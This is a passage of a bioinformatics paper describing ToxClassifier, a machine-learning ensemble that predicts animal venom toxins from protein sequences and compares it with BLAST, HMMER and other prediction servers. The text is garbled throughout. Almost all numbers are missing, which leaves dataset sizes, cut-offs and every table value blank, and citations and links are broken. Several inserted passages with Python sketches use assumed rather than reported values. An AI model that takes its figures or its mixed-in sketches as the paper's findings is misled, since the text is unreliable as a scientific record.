collected and all duplicates (with identical sequence or sequence identifier), and all sequences also present in positive dataset or easy dataset were removed, resulting in , proteins. ( ) ‘hard’ negative dataset was constructed from trembl database (bairoch & apweiler, ) instead of swiss-prot. as with moderate dataset, it was created from results of blastp using positive dataset as query and trembl as target database. duplicates and sequences also occurring in positive, easy or moderate datasets were removed for total of , sequences. all datasets are available for download at https://github.com/rgacesa/toxclassifier/tree/ master/datasets. machine learning classifiers, training and testing models describing protein sequences were constructed as follows: ( ) single amino acid frequency model (of): model uses length of sequence and frequency of each amino acid as input features. ( ) amino acid dimer frequency model (bif): model uses length of sequence, frequency of each amino acid and of each amino acid -mer. ( ) naive tox-bits model (ntb): input features for this model are the number of ‘tox-bits’ for each ‘tox-bits’ hmm listed in the ‘tox-bits’ database (starcevic et al., ). ( ) scored ‘tox-bits’ model (stb): stb is a modification of the ntb model, with hmm bit-scores replacing the number of ‘tox-bits’ in each ‘tox-bit’ hmm model. ( ) tri-blast simple (tbs) model: tbs uses blastp searches against positive (uniprotkb/swissprot-toxprot) and two negative control databases (close non-toxins from uniprotkb/swissprot and non-toxins from trembl); features include bit-score, query length, subject length, query/subject length ratio, query coverage, percentage of iden- tity, percentage of positive matches; features also include amino-acid frequencies. scores are computed from the ‘best-hit’ in each database, with a blast e-value of . e– . 
( ) tri-blast enhanced a (tbea) model: tbea model is an expanded variant of tbs, with amino dimer frequencies included in the model. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rgacesa/toxclassifier/tree/master/datasets https://github.com/rgacesa/toxclassifier/tree/master/datasets http://dx.doi.org/ . /peerj-cs. ( ) tri-blast enhanced b (tbeb): model is a variation of tbea, trained on % of the input dataset and with a blast e-value cut-off value of . e+ for the detection of similar toxin or non-toxic sequences. feature extraction and vectorisation was implemented using the python . (https://www.python.org/download/releases/ . /) scripting language, ncbi blast+ version . . (camacho et al., ), hmmer . b (eddy, ), the ‘tox-bit’ hmm profile database (starcevic et al., ) and a set of custom blast databases based on uniprotkb/swissprot-toxprot, uniprotkb/swissprot and trembl databases. vectorization scripts, vectorised data sets and trained models are available for download at https://github.com/rgacesa/toxclassifier. support vector machine (svm), gradient boosted machine (gbm) and generalised linear model (glm) classifiers were trained for each of the models; classifiers were implemented using the r-programming language, caret package (http://topepo.github.io/ caret/index.html). the training set for each dataset was selected by random sampling of % of the sequences, and combined training sets were used to train the classifiers. input features were -centered and scaled by standard deviation and training was performed with internal bootstraps. learning curves were constructed for each classifier to evaluate training efficiency and potential overtraining by plotting performance versus number of sequences in training set. classifiers were tested using those sequences from positive, easy, moderate and hard datasets not used in training. performance was evaluated on each of the datasets and on the summary dataset. the following performance measurements were calculated: ( ) number of true positives (tp): number of toxic sequences in dataset correctly predicted as toxins; sequence was considered a toxin if listed in uniprotkb/toxprot database. ( ) number of true negatives (tn): number of non-toxic sequences in dataset which are correctly predicted as non-toxic (not in uniprotkb/toxprot database). ( ) number of false positive (fp): number of non-toxic sequences in dataset incorrectly classified as toxins. ( ) number of false negatives (fn): number of toxic sequences in dataset incorrectly classified as non-toxic. ( ) accuracy (acc): accuracy is calculated as proportion of sequences correctly classified as toxins or non-toxins; acc = (tp + tn) / (tp + tn + fp + fn). ( ) specificity (spec): also called true negative rate, specificity is proportion of correctly predicted non-toxins (true negatives); spec = tn / (tn + fp). ( ) sensitivity (sens): also called true positive rate or recall, sensitivity is proportion of correctly predicted toxins (true positives); sens = tp/(tp + fn). ( ) balanced accuracy (b.acc): balanced accuracy is a mean value of specificity and sensitivity; bacc = (spec + sens)/ . ( ) negative predictive value (npv): proportion of negatives that are true negatives. npv = tn/(tn + fn). ( ) positive predictive value (ppv): also called precision, ppv measures proportion of positives which are true positives; ppv = tp/(tp + fp). gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. 
( ) f-score (f1): the f-score is the harmonic mean of precision and sensitivity and represents a weighted average of precision and recall. it is calculated as f1 = 2*tp / (2*tp + fp + fn). ( ) matthews' correlation coefficient (mcc): the mcc value (also known as the phi-coefficient) is a measure of correlation between observed and predicted classifications. it is considered a balanced measure even for classes with different amounts of positive and negative values; mcc = (tp*tn - fp*fn) / sqrt((tp + fp)*(tp + fn)*(tn + fp)*(tn + fn)) (matthews, ; powers, ). conventional annotation models annotation models simulating manual annotation were constructed based on blast and hmmer, as follows: ( ) naive-blast: this annotation method is based on the assumption that a sequence is a toxin if a blast search against the uniprotkb/swissprot-toxprot dataset returns a positive hit at a certain e-value (usually between . e– and . e– ). this approach and its variations are commonly encountered in the literature (sher & zlotkin, ; schwartz et al., ; liu et al., ; whittington et al., ). ( ) oneblast: this approach classifies a sequence by a single blast search against a database combining uniprotkb/swissprot-toxprot and other 'toxin-like' but non-toxic sequences extracted from the uniprotkb/swissprot and trembl databases (a combination of the positive, moderate and hard datasets). a sequence is classified as a putative toxin if the highest-scoring blast hit at a selected e-value is from uniprotkb/swissprot-toxprot; it is classified as non-toxic if the top blast hit is not from uniprotkb/swissprot-toxprot, or if all blast hits are above the selected e-value. ( ) triblast: annotation is performed by a variation of oneblast, using separate blast searches against uniprotkb/swissprot-toxprot and two non-toxin databases (the moderate and hard datasets); a sequence is classified as a toxin if the blast search against uniprotkb/swissprot-toxprot returns a hit below a certain e-value and with a higher score than the searches against the other databases. variations of this method are commonly used in toxin annotation (gacesa et al., ; rachamim et al., ). ( ) hmmertoxbits: this method is a variation of naive-blast, using the hmmer package hmmsearch instead of blast, and the database of 'tox-bits' hmm models as the target database. a sequence is classified as a toxin if one or more hmms can be detected within a certain e-value cut-off. ( ) hmmervenom: a modification of hmmertoxbits, this method uses hmm profiles extracted by a 'venom' and 'toxin' text search of the pfam database instead of 'tox-bit' hmms. ( ) twinhmmerpfam: a hmmer-based variant of the triblast approach, this method performs hmmsearches against two hmm databases (toxin/positive hmms and a negative control) and compares bitscores. a sequence is annotated as a toxin if the bitscore against the toxin hmm database is higher. twinhmmerpfam toxin hmms were extracted from pfam by keyword search for 'toxin' and 'venom', while the negative control database comprises the remainder of pfam. ( ) twinhmmertoxbits: a variation of the twinhmmerpfam method, which compares hmmsearch results against toxin hmms and a negative control.
for this model, positive database is composed from ‘tox-bit’ hmms derived from tox-prot toxins (starcevic et al., ), while negative control is pfam database from which hmms containing ‘toxin’ or ‘venom’ keywords were removed. blast databases for naive-blast, oneblast and triblast were constructed from % randomly sampled sequences in positive, easy, moderate and hard and performance was measured by annotating remainder of data. hmmer based methods were tested with % of random sequences from input datasets, using all appropriate hmm models. database construction and testing was repeated times and results were averaged. toxclassifier meta-classifier calibration and testing toxclassifier meta-classifier was constructed from nine annotation model and classifier combinations (bif_svm, bif_gbm, stb_svm, stb_gbm, tbs_svm, tbs_svm, tbea_svm, tbeb_svm and tbeb_gbm). each of nine classifiers reports if the input sequence is predicted as toxin or if predicted as non-toxic, for final prediction score of to . datasets used for calibration of meta-classifier were chosen from the set of venomous and non-venomous animals (human homo sapiens, the house mouse mus musculus, the burmese python python bivittatus, king cobra ophiophagus hannah, the duck-billed platypus ornithorhynchus anatinus, the snakelocks sea anemone anemonia viridis, the starlet sea anemone nematostella vectensis; and all proteins deposited in the uniprotkb/swissprot and trembl databases attributed to snakes, spiders, wasps and conus snails). all sequences were downloaded from uniprotkb database with exception of python bivittatus which was not available in uniprotkb and was downloaded from ncbi protein database (wheeler et al., ); all data is available at https://github.com/rgacesa/toxclassifier/tree/master/datasets. datasets were split into training sets consisting of % of data and test sets including remaining % of sequences. toxclassifier meta-classifier was calibrated by evaluating prediction score versus per- formance for each animal training set and for summary dataset constructed by combining animal training datasets with exclusion of conus snail data, which was dropped due to sus- pected low quality of annotation. calibrated toxclassifier, with prediction score or more as cut-off for positive classification, was tested on animal data test sets, and performance measures were compared to oneblast, naiveblast models and clantox server. data used for training and testing and all calculated performance metrics are available at https: //github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test. toxclassifier comparison to other published tools performance of clantox server (kaplan, morpurgo & linial, ) was tested on positive, easy, moderate and hard datasets and on animal data test sets. toxinpred server (gupta et al., ) was tested on positive dataset sequences of length up to amino acids (toxinpred sequence length limit) and on negative dataset composed amino acid or shorter protein sequences randomly selected from uniprot database ( , non-duplicate, non-toxprot sequences). toxinpred was not tested on animal data due to lack of short gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rgacesa/toxclassifier/tree/master/datasets https://github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test https://github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test http://dx.doi.org/ . /peerj-cs. 
sequences available in these datasets. spiderp server (wong et al., ) was not tested as service was not available at the time and predcsf server (fan et al., ) was not tested as it was deemed too specialized and only accepts single sequence as input. user interface the toxclassifier web service front-end is implemented using html . (https://www. w .org/html/), javascript (https://www.javascript.com/), jquery (https://jquery.com/), css (https://www.w .org/style/css/), java . (https://www.oracle.com/java/index.html) and the java server pages (jsp . ) framework (http://www.oracle.com/technetwork/java/ javaee/jsp/index.html). visualisation is performed using r (https://www.r-project.org/), ggplot (http://ggplot .org/) and r markdown (http://rmarkdown.rstudio.com/) packages. toxclassifier runs on an apache tomcat . web server (http://tomcat.apache.org/ download- .cgi), under an ubuntu linux . operating system (http://www. ubuntu.com/). the service is hosted by the section of bioinformatics, faculty of food technology and biotechnology, university of zagreb, croatia (http://www.pbf.unizg.hr/ en/departments/department_of_biochemical_engineering/section_for_bioinformatics). results the accuracy of three individual machine-learning classifiers to predict toxins from proteins having other physiological functions was assessed by training each classifier using seven different annotation models. the learning classifiers were a support vector machine (svm) and gradient boosted machine (gbm) chosen as high-performing predictors, and a generalised linear model (glm) regarded as a simple classifier, but with which a baseline could be established that would allow comparison of the performance of the svm and gbm machines. a detailed description of the annotation models is given in ‘methods’ section, but briefly the annotation models used the following sequence information from the training set as classifier inputs: either the frequency of amino acids (tbsim) or combinations of two amino-acids (bif), the presence of absence or ‘tox-bits’ (stoxa), hmm scores for ‘tox-bits’ (stoxb), a selection of blast output co-variants (tbea) or a variation on tbsim and tbea (tbeb). the training set was constructed by merging % of arbitrarily selected sequences from each of the following datasets: / a ‘positive’ dataset that contained all , protein sequences deposited in the uniprotkb/swissprot-toxprot database of animal venom toxins (jungo et al., ). / an ‘easy’ dataset composed of , random, non-duplicate sequences from uniprotkb/swissprot database (bateman et al., ). / a ‘moderate’ dataset comprised of , unique sequences from the manually curated uniprotkb/swissprot database considered to be non-toxic but with homology to toxin proteins in uniprotkb/swissprot-toxprot. / a ‘hard’ dataset that included , non- duplicate sequences extracted from the computer annotated trembl (bairoch & apweiler, ) database, also considered to be non-toxic but with homology to animal venom toxins in uniprotkb/swissprot-toxprot. all training was performed using internal bootstrap cross-validations on the training set, and learning curves showing the accuracy of predictions versus the number of sequences gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. 
in the training sets were constructed, thereby allowing a comparative evaluation of training efficiency (fig. s ). the trained classifiers were then tested for prediction accuracy using the remaining % of sequences not included in the training set. performance values were calculated to give an overall comparative classification of protein sequences as toxins or non-toxins (table ). by comparing learning curves (fig. s ) and accuracy of predictions (table ), of the annotation model and classifier combinations were chosen to construct the 'toxclassifier' ensemble. the trained classifiers were: bif_svm, bif_gbm, stb_svm, stb_gbm, tbs_svm, tbs_svm, tbea_svm, tbeb_svm and tbeb_gbm. these classifiers all gave excellent accuracy scores to predict toxins from the positive dataset (range . – . ) and non-toxin proteins from the easy, moderate and hard datasets (range . – . ). no glm classifiers were included in the ensemble because their prediction accuracies were considerably lower when compared with the svm and gbm machines. classifiers using the ntb and of annotation models were also abandoned in favour of the better performing stb and bif models. furthermore, the tbea_gbm model consistently underperformed compared to the tbea_svm model and was excluded, giving an odd number of classifiers in the ensemble and thereby avoiding a 'tied vote' scenario when the outputs were interpreted collectively. the prediction accuracy of the trained machine learning classifiers was next compared to more conventional annotation methods based on sequence alignment, to determine whether machine learning predictions were superior or inferior to well-established and accepted bioinformatics tools. a detailed description of the annotation models based on these bioinformatics tools is given in 'methods.' briefly, simple predictions were made by taking the best-hit from blast comparisons between a query sequence and the uniprotkb/swissprot-toxprot database (naiveblast method), or the best-hit following a hmmer hmmsearch comparison between a query sequence and either existing hmm models for toxin protein families in the pfam database (hmmervenom model), or our own 'tox-bits' hmm models (hmmertoxbits classifier). more sophisticated annotation models also used blast or hmmer searches, but the best-hit was extracted following simultaneous comparisons between the query sequence and multiple datasets.
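For orientation, the naiveBLAST-style decision rule summarised above can be reduced to a short script. This is a hedged sketch rather than the authors' pipeline: the database name 'toxprot_db' and the e-value cut-off are placeholders, and only the 'any hit below the cut-off' rule is implemented; the oneBLAST and triBLAST variants would additionally compare the best hits obtained from the non-toxin databases.

# Sketch of a naiveBLAST-style rule: call a sequence a putative toxin when blastp against a
# ToxProt-derived database returns any hit below an E-value cut-off.
# 'toxprot_db' and the query file name are placeholders, not the authors' exact setup.
import subprocess

def best_hit_evalue(query_fasta, db, evalue_cutoff=1e-5):
    """Return {query_id: best_evalue} for queries with at least one hit below the cut-off."""
    out = subprocess.run(
        ["blastp", "-query", query_fasta, "-db", db,
         "-evalue", str(evalue_cutoff),
         "-outfmt", "6 qseqid sseqid evalue bitscore",
         "-max_target_seqs", "5"],
        check=True, capture_output=True, text=True,
    ).stdout
    best = {}
    for line in out.splitlines():
        qseqid, _sseqid, ev, _bits = line.split("\t")
        ev = float(ev)
        if qseqid not in best or ev < best[qseqid]:
            best[qseqid] = ev
    return best

def naive_blast_classify(query_fasta, toxprot_db="toxprot_db", evalue_cutoff=1e-5):
    # anything without a qualifying hit is treated as non-toxic
    hits = best_hit_evalue(query_fasta, toxprot_db, evalue_cutoff)
    return {q: "toxin" for q in hits}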
these sophisticated annotation models are also described in ‘methods’, but briefly these models were constructed from sequence information extracted from either uniprotkb/swissprot- toxprot sequences supplemented with additional toxin-like sequences from the uniprotkb/swissprot and trembl databases, or uniprotkb/swissprot-toxprot sequences supplemented with non-toxin sequences from the ‘moderate’ and ‘hard’ datasets used to train the machine classifiers. training and test sets were analogous in design and execution to the machine classifier learning, with % of sequence information used to construct the blast and hmmer databases and the remaining % of data used to evaluate performance. prediction accuracy measures for each query sequence using each of the bioinformatics models were repeated times to give a final balanced accuracy value. accuracy measure calculations are described in ‘methods’. a range of sequence-alignment scoring was also tested to select the lowest blast and hmmer cut-off scores that gave the most precise toxin annotation. this value was . e- for both blast and hmmer searches (fig. s ). gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table prediction accuracy on positive and negative datasets, as well as range of measurements calculated for all test data, and described in detail in ‘methods.’ an- notation models used as classifier inputs either: the frequency of amino acids (tbsim) or combinations of two amino-acids (bif); the presence of absence or ‘tox-bits’ (stoxa); hmm scores for ‘toxbits’ (stoxb); a selection of blast output co-variants (tbea); a variation on tbsim and tbea (tbeb). classifier learning machines used were: gradient boosted (gbm), support vector (svm) and generalised linear model (glm). the datasets were a ‘positive’ control containing only validated animal tox- ins, an ‘easy’ dataset composed of non-toxin sequences, a ‘moderate’ dataset comprising curated non-toxin sequences but with homology to ‘positive’ sequences, and a ‘hard’ dataset that included all sequences from the ‘moderate’ dataset, together with un-curated sequences also with homology to ‘positive’ sequences. classification scores for: test set summary annotation model classifier accuracy (positive toxin dataset) accuracy (easy non-toxin dataset) accuracy (moderate non-toxin dataset) accuracy (hard non-toxin dataset) ppv npv sens. spec. f -value mcc gbm . . . . . . . . . . svm . . . . . . . . . . tbsim glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . bif glm . . . . . . . . . . gvm . . . . . . . . . . stoxa svm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . stoxb glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . tbea glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . tbeb glm . . . . . . . . . . g acesa etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning classifiers were also evaluated against currently available published tools for toxin prediction and annotation; animal toxin prediction server clantox (kaplan, morpurgo & linial, ) was benchmarked using positive, east, moderate and hard datasets and summary of these datasets. 
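The comparisons that follow are reported with the performance measures defined in the methods. As a compact reference, all of them can be derived from the four confusion counts; the helper below follows those formulas directly (it assumes non-degenerate counts, i.e., no zero denominators apart from the guarded MCC term).

# Performance measures as defined in the methods, computed from confusion counts.
import math

def classification_metrics(tp, tn, fp, fn):
    acc   = (tp + tn) / (tp + tn + fp + fn)
    sens  = tp / (tp + fn)          # recall / true positive rate
    spec  = tn / (tn + fp)          # true negative rate
    b_acc = (sens + spec) / 2
    ppv   = tp / (tp + fp)          # precision
    npv   = tn / (tn + fn)
    f1    = 2 * tp / (2 * tp + fp + fn)
    mcc_den = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    mcc   = (tp * tn - fp * fn) / mcc_den if mcc_den else 0.0
    return {"accuracy": acc, "sensitivity": sens, "specificity": spec,
            "balanced_accuracy": b_acc, "ppv": ppv, "npv": npv,
            "f1": f1, "mcc": mcc}

# Example with made-up counts (not values from the paper):
# classification_metrics(tp=90, tn=950, fp=50, fn=10)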
as toxinpred (gupta et al., ) tools predict only small peptide toxins, it was tested using a subset of positive dataset with sequences no longer than amino acids ( sequences) and separate negative dataset composed of , random short proteins from uniprotkb database. spiderp (wong et al., ) was not benchmarked as the server no longer seems publically available. finally, predcsf (fan et al., ) is a conotoxin-specific tool and was deemed not comparable to general annotation tools; it also only allows single sequence input, making it unsuitable for large scale testing. final performance measures compared between the different tools are listed in table . testing of sequence-alignment based annotation models (table ) demonstrated that the simplistic methods (naiveblast, hmmertoxbits and hmmervenom) gave high prediction accuracies for sequences in the easy dataset (ranging from . for hmmervenom to . for naiveblast), but underperformed in annotation of the physiological toxin-like sequences in the moderate and hard datasets (accuracies ranging from . to . for moderate and . to . for hard dataset (the poor performance here, also evinced by the low f and mcc scores)). more sophisticated blast-based methods (oneblast and triblast) gave very high prediction accuracy scores ( . – . ) for sequences in the easy and moderate datasets, but somewhat lower performance on sequences in the positive and hard datasets ( . – . ). pfam-based twinhmmer gave the highest accuracy prediction for non-toxin sequences, but underperformed compared to the other annotation models against sequences in the positive toxin dataset (accuracy . ). the ‘tox-bits’ based variant accurately predicted sequences in the easy and moderate datasets (accuracy . – . ), but suffered from a high false positive rate when sequences in the hard dataset were analysed (accuracy . ). when compared to machine learning-based methods, even the most accurate of the sequence alignment-based models (oneblast and triblast) were surpassed by the majority of the machine learning based classifiers, especially by tbea and tbeb models (svm and gbm variants), which gave the highest accuracy of prediction for sequences in all test datasets. all prediction methods showed higher performance for negative prediction (predicting non-toxin as non-toxin) compared to positive prediction (correctly predicting toxin as toxic), with specificity (spec) and negative prediction value (npv) significantly higher than sensitivity (sens) and positive prediction value (ppv). each of the machine learning classifiers used in the ‘toxclassifier’ ensemble gives a simple bit ( or ) value as output to predict whether the likely biological activity of the input sequence is as a toxin ( ), or has a non-toxic ( ) physiological role and scores are summed into final prediction score ranging from to . evaluation of this final prediction score was performed on test sets obtained from randomly sampling % of sequences in the published annotated genomes from a selection of venomous animals (king cobra ophiophagus hannah, the duck-billed platypus ornithorhynchus anatinus, the snakelocks sea anemone anemonia viridis, the starlet sea anemone nematostella vectensis; and all proteins deposited in the uniprotkb/swissprot and trembl databases attributed to snakes, gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance for selected annotation models and published toxin prediction tools. 
prediction accuracy is listed for positive and negative datasets and mea- surements are also shown for summary of all test data. toxinpred server, marked with star and displayed in italic, was tested with short protein sequences only. annota- tion models were constructed from sequence information extracted from either: blast (naiveblast), ‘tox-bits’ hmm (hmmertoxbits) or pfam hmm (hmmervenom) comparisons with the uniprotkb/swissprot-toxprot database; or blast (oneblast), ‘tox-bits’ hmm (twinhmmerpfam) or pfam hmm (twinhmmerpfam) com- parisons with the uniprotkb/swissprot-toxprot sequences supplemented with additional toxin-like sequences from the uniprotkb/swissprot and trembl databases; or blast (triblast) comparisons with the uniprotkb/swissprot-toxprot sequences supplemented with non-toxin sequences from the ‘moderate’ and ‘hard’ datasets used to train the machine classifiers. the datasets were a ‘positive’ control containing only validated animal toxins, an ‘easy’ dataset composed of non-toxin sequences, a ‘moderate’ dataset comprising curated non-toxin sequences but with homology to ‘positive’ sequences, and a ‘hard’ dataset that included all sequences from the ‘moder- ate’ dataset, together with un-curated sequences also with homology to ‘positive’ sequences. classification scores for: test set summary annotation model tool accuracy (positive toxin dataset) accuracy (easy non-toxin dataset) accuracy (moderate non-toxin dataset) accuracy (hard non-toxin dataset) ppv npv sens. spec. f -value mcc naiveblast blast . . . . . . . . . . oneblast blast . . . . . . . . . . triblast blast . . . . . . . . . . hmmertoxbits hmmer . . . . . . . . . . hmmervenom hmmer . . . . . . . . . . twinhmmerpfam hmmer . . . . . . . . . . twinhmmertoxbits hmmer . . . . . . . . . . clantox server ml . . . . . . . . . . toxinpred server* ml . . n/a n/a . . . . . . g acesa etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spiders, wasps and conus snails) and other animals considered to be non-venomous (human homo sapiens, the house mouse mus musculus and the burmese python python bivittatus). calibration was performed by assessing the performance measures of the toxclassifier ensemble relative to prediction score; calibration curves for summary of all animal genome data are presented in fig. . when the average correct annotation of all input sequences for all genomes was calculated, a combined score from five out of the nine classifiers giving correct classification provided a good balance between the detection of toxins and the filtering of non-toxins. hence, a calibration for the toxclassifier ensemble was possible where an input sequence giving a combined score of > would be considered a likely toxin, a combined score of < would be regarded as non-toxic, while an input sequence presenting with a score or would suggest a potential toxin, but would require manual evaluation using additional tools, for example, interproscan (zdobnov & apweiler, ). performance of calibrated ‘toxclassifier’ meta-classifier was evaluated on a test set comprising % of the animal genome data not used for calibration; these results were compared to naiveblast and oneblast conventional methods and to clantox server for animal toxin prediction (kaplan, morpurgo & linial, ). performance measurements are reported in table and comparison of f -scores and mcc values across all datasets is presented in fig. ; figs. s /a and s /b. 
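A minimal sketch of the vote aggregation and calibration logic described above follows. The exact band edges are not recoverable from this copy of the text, so the defaults (a positive call at five or more of the nine votes, with a narrow band just below flagged for manual review) are assumptions chosen to match the 'five out of the nine classifiers' statement, not the published calibration.

# Sketch of ToxClassifier-style vote aggregation: nine base classifiers each emit 0/1 and the
# sum (0-9) is mapped to a three-band call. Band edges below are assumptions, not the
# published calibration values.
def aggregate_votes(votes, toxin_cutoff=5, review_band=(4, 4)):
    """votes: iterable of nine 0/1 predictions; returns (score, call)."""
    votes = list(votes)
    assert len(votes) == 9 and all(v in (0, 1) for v in votes)
    score = sum(votes)
    if score >= toxin_cutoff:
        call = "likely toxin"
    elif review_band[0] <= score <= review_band[1]:
        call = "potential toxin - manual annotation recommended"
    else:
        call = "non-toxic"
    return score, call

# Example: six of the nine classifiers vote 'toxin'
# aggregate_votes([1, 1, 1, 0, 1, 1, 0, 1, 0])  ->  (6, 'likely toxin')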
finally, the ‘toxclassifier’ was assessed in a blinded experiment that used as input a set of protein sequences derived from the venom gland transcriptome of the amazonian rain forest pit viper bothrops atrox (data s ). the sequences had been annotated using standard methods and manually inspected, with the biological activities of some also being authenticated experimentally. the results of the ‘toxclassifier’ predictions matched with the expert annotation (table ). discussion the continued decline in proteomics sequencing costs over recent years has led to an explosion in venomics data characterising the toxic peptide and protein components in many venomous animals (kaas & craik, ). however, there is currently no widely accepted and standard method for functional annotation of toxins from these data sources, leading to inconsistent estimates for the number of toxins in the venom of the same animal. for example, the venom of the duck-billed platypus ornithorhynchus anatinus has only toxins listed following manual annotation in the latest release of the uniprotkb/swissprot- toxprot database ( th may ), yet putative toxins were identified by a simple pair-wise blastp search using venom gland transcriptome sequences as input to search the uniprotkb/swissprot toxprot database (jungo et al., ). in addition to separate homology searching methods to interpret the same data, many venomics projects now also include different manual filtering steps as part of the annotation process (rachamim et al., ; gacesa et al., ), exacerbating the problem of results verification. in this study, a selection of machine learning-based classifiers implementing a range of blast and hmmer-based annotation models were trained on datasets of known toxins, protein sequences assumed to be non-toxic but with homology to known toxins, and predicted proteins encoded in the genome, transcriptome or proteome of a range of gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure calibration curves used to select final prediction scores for toxclassifier ensemble. each of performance measures, described in detail in methods, is shown for toxclassifier prediction with toxin prediction cut-off values – . dotted green line shows trends of prediction measurement with increase in toxclassifier cut-off value and final cut-off value implemented in calibrated toxclassifier is highlighted with blue line. venomous and non-venomous animals. a comparison between the results presented in tables – demonstrated that the majority of the machine learning methods consistently out-performed standard bioinformatics approaches of functional annotation. interestingly, all tested methods demonstrated higher performance for negative prediction (classification of non-toxic sequences) compared to positive classification (prediction of toxic sequences as toxins). these results demonstrate that differentiating between physiological toxin-like proteins and actual toxins is more difficult then prediction of random proteins as non-toxic, which is to be expected considering the similarity and common origin of many toxins and toxin-like sequences (fry, ; chang & duda, ; hargreaves et al., ). as such, it is important to consider balanced performance measurements when assessing toxin classifiers, with scores such as f -score and mcc value (matthews, ; powers, ) providing gacesa et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table toxclassifier calibrated meta-classifier, test set results compared to oneblast, naiveblast and clantox annotation methods. table lists comparison of classification performance for calibrated toxclassifier to blast based annotation models and clantox toxin prediction server. all tests were conducted test dataset not used in calibration of toxclassifier. classification performance of toxclassifier meta-classifier, compared to blast based methods and clantox server annotation model tool accuracy positive prediction value negative prediction value sensitivity specificity f -value mcc value naiveblast blast . . . . . . . oneblast blast . . . . . . . clantox server ml-based . . . . . . . toxclassifier ml-based . . . . . . . figure comparison between selected toxin prediction tools for all animal test datasets. calibrated toxclassifier, with positive prediction cutoff , is shown by green bar, clantox prediction server is displayed in orange, oneblast prediction performance in red and naiveblast in blue. f - value and matthews’ correlation coefficient are displayed for each of test sets and for summary of all data with exclusion of conus snail proteins. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of expert manual annotation to toxclassifier annotation for set of novel proteins from venom gland transcriptome of bothrops atrox snake. sequence annotation test sample ‘toxclassifier’ standard annotation test potential toxin bpp precursor—toxin test potential toxin crisp—toxin test toxin ctl—toxin test toxin ctl—toxin test potential toxin hyaluronidase—toxin test potential toxin kunitz –like sequence—probably a toxin test toxin laao—toxin test not a toxin nucleotidase—probably not a toxin test not a toxin phosphodiesterase— probably not a toxin test toxin pla —toxin test toxin svmp class pi—toxin test toxin svmp class pii—toxin test toxin svmp class piii—toxin test toxin svsp—toxin test potential toxin vegf—toxin more appropriate measurements of performance than simple accuracy. another issue of toxin classification lies in unbalanced datasets, because most venomous animal genomes encode less than toxins and , – , physiological non-toxic proteins; as a result, even a high performing method can generate a high number of false positive predictions. for example, . % correct prediction of non-toxins results in ∼ false positive toxins for an average animal proteome, which is in fact more than the actual number of true toxins. in order to minimize both of these problems, the toxclassifier training scheme was conservative, using only well-annotated toxins from uniprotkb/toxprot database as positives, and while this might lead to a somewhat lower positive prediction rate (due to missing likely toxins which are not annotated as such), it does serve to minimise the false positive rate. notably, predictions were less accurate on some genome datasets, especially conus snail proteins, with low performance metrics observed for all tested annotation methods. this discrepancy was likely caused by the assumption that sequences deposited in the uniprotkb/swissprot-toxprot sequence are bona fide toxins, while sequences in the uniprotkb/swissprot and trembl databases without ‘toxin’ or ‘venom’ keywords are not toxins. 
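The class-imbalance argument above can be made concrete with a back-of-the-envelope calculation. The counts are not recoverable from this copy of the text, so the figures below are illustrative assumptions only, chosen to show how a small false-positive rate applied to a whole proteome can rival or exceed the number of true toxins.

# Illustrative arithmetic only: the real counts are not recoverable from this copy.
# Assume an animal proteome with ~20,000 non-toxic proteins and ~100 true toxins.
non_toxins = 20_000
true_toxins = 100
specificity = 0.995                       # 99.5% of non-toxins correctly rejected

expected_false_positives = (1 - specificity) * non_toxins
print(expected_false_positives)           # 100.0 -> already as many as the true toxins
print(expected_false_positives >= true_toxins)   # True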
given that toxin activity is attributed to most sequences without biological validation, it is likely that the training datasets almost certainly excluded a number of toxin sequences and included some yet unknown toxins as non-toxic. another limitation of the ‘toxclassifier’ lies in the inherent bias of the training sets; an underrepresentation in sequences from certain animal lineages, particularly the basal metazoa, e.g., cnidaria, could lead to incorrect assignment and suspicious quality of existing annotation of conotoxins is a reason to treat prediction on this protein class with caution. to elevate these problems, ‘toxclassifier’ has been designed to also report sequences suspected to gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. have closest homology to underrepresented taxa as ‘suspicious toxin’ and recommends manual annotation with other tools, such as interproscan (zdobnov & apweiler, ). use of machine learning for toxin prediction has been attempted before and a range of such tools exists; however, most of the available tools are heavily specialised for toxins of specific animal origins. for example, spiderp (wong et al., ) (http: //www.arachnoserver.org/spiderp.html) is a predictor for spider toxins while toxinpred (gupta et al., ) (http://crdd.osdd.net/raghava/toxinpred/) predicts only small peptide toxins; while clantox (kaplan, morpurgo & linial, ) (http://www.clantox.cs.huji.ac. il/tech.php) was trained only on an ion-channel toxin dataset and predcsf (fan et al., ) (http://www.csbio.sjtu.edu.cn/bioinf/predcsf/) is conotoxin specific. in addition, the reported training set sizes are low (for example clantox was trained on ∼ ion channel 